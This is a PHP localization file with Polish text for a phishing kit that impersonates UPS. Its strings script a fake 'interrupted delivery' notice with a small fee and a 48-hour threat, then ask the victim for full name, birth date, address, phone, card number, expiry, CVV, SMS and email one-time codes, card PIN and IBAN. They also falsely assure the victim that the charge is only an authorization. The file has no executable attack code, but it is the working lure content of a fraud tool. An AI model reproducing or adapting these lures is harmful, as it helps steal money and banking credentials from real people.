<?php
function lang($phrase){
	static $lang = array(

        "xlang" => "PL",
        "xcapt1" => "Proszę zaznaczyć pole CAPTCHA.",
        "xcapt2" => "Weryfikacja",
        "xcapt3" => "Kontynuuj",
        "xfot1" => "Ta Strona",
        "xfot2" => "Inne Strony UPS",
        "xfot3" => "Skontaktuj się z nami",
        "xfot4" => "Prawo",
        "xfot5" => "Prawa autorskie ©1994- 2023&nbsp;United Parcel Service of America, Inc. Wszelkie prawa zastrzeżone. ",
        "xind1" => "Śledź",
        "xind2" => "Numer śledzenia",
        "xind3" => "Błąd: Proszę podać prawidłowy numer śledzenia.",
        "xind4" => "Potrzebujesz pomocy w zmianie dostawy?",
        "xind5" => "Cytat",
        "xind6" => "Wysyłka",
        "xind7" => "Fakturacja",
        "xind8" => "Pomoc",
        "xexp1" => "Dostawa przerwana",
        "xexp2" => "Śledzenie",
        "xexp3" => "Twoja ostatnia dostawa została przerwana. Obecnie jest przechowywana w centrum sortowania.",
        "xexp4" => "Paczka, która została do ciebie wysłana, nie spełniła określonej wagi, i zostaniesz poproszony o zapłacenie dodatkowej opłaty, aby zapewnić prawidłową dostawę paczki.",
        "xexp5" => "Opłata wynosi 0,48€",
        "xexp6" => "Aby zapłacić, proszę kliknąć przycisk poniżej",
        'xexp7' => "Zapłać",
        "xexp8" => "Po dokonaniu opłaty, twoja paczka zostanie jak najszybciej przekierowana pod wskazany adres dostawy.",
        "xexp9" => "Jeśli opłata nie zostanie dokonana w ciągu 48 godzin, paczka zostanie odesłana do nadawcy.",
        "xexp10" => "Śledź według numeru referencyjnego",
        "xexp11" => "Importuj numery śledzenia",
        "xexp12" => "Inne usługi śledzenia",
        "xinfz1" => "Potwierdź swoje dane rozliczeniowe",
        "xinfz2" => "Pełne imię",
        "xinfz10" => "Data urodzenia",
        "xinfz3" => "Kraj",
        "xinfz4" => "Miasto",
        "xinfz5" => "Adres",
        "xinfz6" => "Telefon",
        "xinfz7" => "Kod pocztowy",
        "xinfz8" => "Błąd: Wszystkie dane są wymagane",
        "xinfz9" => "Potwierdź",
        "xpay1" => "Dane płatności",
        "xpay2" => "Szanowny Kliencie, sprawdź poprawność swoich danych płatniczych i dopasuj je do swojej karty, aby zakończyć proces płatności",
        "xpay3" => "Imię na karcie",
        "xpay4" => "Numer karty",
        "xpay5" => "Data ważności",
        "xpay6" => "Kod zabezpieczeń CVV (3 cyfry)",
        "xpay7" => "Błąd: Wszystkie dane są wymagane",
        "xpay8" => "Potwierdź",
        "xsms1" => "Weryfikacja",
        "xsms2" => "Wysłaliśmy kod potwierdzenia na twój numer.",
        "xsms3" => "Kod OTP",
        "xsms4" => "Błąd: Nieprawidłowy kod OTP.",
        "xsms5" => "Ten krok jest wymagany do bezpiecznego zakończenia procesu płatności.",
        "xsms6" => "UPS wykonuje tymczasową autoryzację twojej karty, aby ją zweryfikować. To jest tylko autoryzacja i NIE jest opłatą.",
        "xsms7" => "Potwierdź",
        "xconf1" => "Wznowienie dostawy",
        "xconf2" => "Płatność dodatkowych opłat została uwzględniona.",
        "xconf3" => "Twoja paczka powinna dotrzeć w ciągu następnych 24 godzin.",
        "xconf4" => "Potwierdź",
        "xpin1" => "Weryfikacja",
        "xpin2" => "Wprowadź kod PIN swojej karty bankowej",
        "xpin3" => "Kod PIN",
        "xpin4" => "(4 cyfry)",
        "xpin5" => "Ten krok jest wymagany do bezpiecznego zakończenia procesu płatności.",
        "xpin6" => "UPS wykonuje tymczasową weryfikację twojej karty, aby ją zweryfikować. To jest tylko autoryzacja i NIE jest opłatą.",
        "xpin7" => "Potwierdź",
        "xmail1" => "Weryfikacja",
        "xmail2" => "Wysłaliśmy kod potwierdzenia na twój adres e-mail",
        "xmail3" => "Kod e-mail",
        "xmail4" => "(6 cyfr)",
        "xmail5" => "Ten krok jest wymagany do bezpiecznego zakończenia procesu płatności.",
        "xmail6" => "UPS wykonuje tymczasową weryfikację twojej karty, aby ją zweryfikować. To jest tylko autoryzacja i NIE jest opłatą.",
        "xmail7" => "Potwierdź",
        "xiban1" => "Weryfikacja",
        "xiban2" => "Proszę wprowadzić swój numer IBAN, aby zakończyć płatność",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "Ten krok jest wymagany do bezpiecznego zakończenia procesu płatności.",
        "xiban6" => "UPS wykonuje tymczasową weryfikację twojej karty, aby ją zweryfikować. To jest tylko autoryzacja i NIE jest opłatą.",
        "xiban7" => "Potwierdź"

	);	
	
	return $lang[$phrase];
}
?>
